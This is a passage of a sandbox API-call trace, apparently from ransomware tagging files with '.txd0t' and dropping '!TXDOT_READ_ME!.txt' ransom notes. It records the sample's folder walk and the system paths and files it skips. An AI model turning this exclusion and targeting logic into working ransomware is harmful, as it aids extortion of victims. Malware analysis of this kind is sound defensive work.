(lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\boot\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\perflogs\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\programdata\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\drivers\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\wsus\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="crypt_detect") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="cryptolocker") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="ransomware") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\WINDOWS") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.733] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files") returned 0x0 [0129.733] GetProcessHeap () returned 0xe30000 [0129.733] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed90d0 [0129.733] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.733] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*" [0129.733] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.733] StrCmpW (psz1=".", psz2=".") returned 0 [0129.733] StrCmpW (psz1="..", psz2=".") returned 1 [0129.733] StrCmpW (psz1="..", psz2="..") returned 0 [0129.733] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.733] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.734] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt" [0129.734] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.734] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.734] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.734] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2=".") returned 1 [0129.734] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2="..") returned 1 [0129.734] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="9t0zT_40.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t" [0129.734] PathFindExtensionW (pszPath="9t0zT_40.mkv.txd0t") returned=".txd0t" [0129.734] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.734] StrCmpW (psz1="a w2nq", psz2=".") returned 1 [0129.734] StrCmpW (psz1="a w2nq", psz2="..") returned 1 [0129.734] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0129.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="a w2nq", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.734] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system32\\") returned 0x0 [0129.734] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.735] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system\\") returned 0x0 [0129.735] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.735] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.735] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\local\\") returned 0x0 [0129.735] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.735] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.735] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\*", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*" [0129.735] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0129.735] StrCmpW (psz1=".", psz2=".") returned 0 [0129.735] StrCmpW (psz1="..", psz2=".") returned 1 [0129.735] StrCmpW (psz1="..", psz2="..") returned 0 [0129.735] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.735] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.735] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.735] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.735] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt" [0129.735] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.735] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.735] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.735] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.735] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.735] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.736] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.736] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2=".") returned 1 [0129.736] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2="..") returned 1 [0129.736] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.736] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.736] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0ll0qUCYfiYHKHKER R", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.736] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.736] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\*", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*" [0129.736] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*", lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b70 [0129.736] StrCmpW (psz1=".", psz2=".") returned 0 [0129.736] StrCmpW (psz1="..", psz2=".") returned 1 [0129.736] StrCmpW (psz1="..", psz2="..") returned 0 [0129.736] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.736] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.736] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.736] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0129.736] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt" [0129.737] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.737] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.737] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.737] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2=".") returned 1 [0129.737] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2="..") returned 1 [0129.737] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="JifxRs4kGA26s8ZB.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t" [0129.737] PathFindExtensionW (pszPath="JifxRs4kGA26s8ZB.swf.txd0t") returned=".txd0t" [0129.737] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.737] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2=".") returned 1 [0129.737] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2="..") returned 1 [0129.737] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="smX5XObO64h XQO8UV.avi.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t" [0129.737] PathFindExtensionW (pszPath="smX5XObO64h XQO8UV.avi.txd0t") returned=".txd0t" [0129.737] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.737] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2=".") returned 1 [0129.737] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2="..") returned 1 [0129.737] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0129.737] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="vH3psvYnWA.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t" [0129.738] PathFindExtensionW (pszPath="vH3psvYnWA.swf.txd0t") returned=".txd0t" [0129.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.738] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2=".") returned 1 [0129.738] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2="..") returned 1 [0129.738] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0qq-2JELVv.avi.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t" [0129.738] PathFindExtensionW (pszPath="0qq-2JELVv.avi.txd0t") returned=".txd0t" [0129.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.738] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2=".") returned 1 [0129.738] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2="..") returned 1 [0129.738] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0129.738] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="fR4 C.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t" [0129.738] PathFindExtensionW (pszPath="fR4 C.mp4.txd0t") returned=".txd0t" [0129.738] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.738] StrCmpW (psz1="I8mA7.swf.txd0t", psz2=".") returned 1 [0129.738] StrCmpW (psz1="I8mA7.swf.txd0t", psz2="..") returned 1 [0129.738] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0129.738] StrNCatW (in: 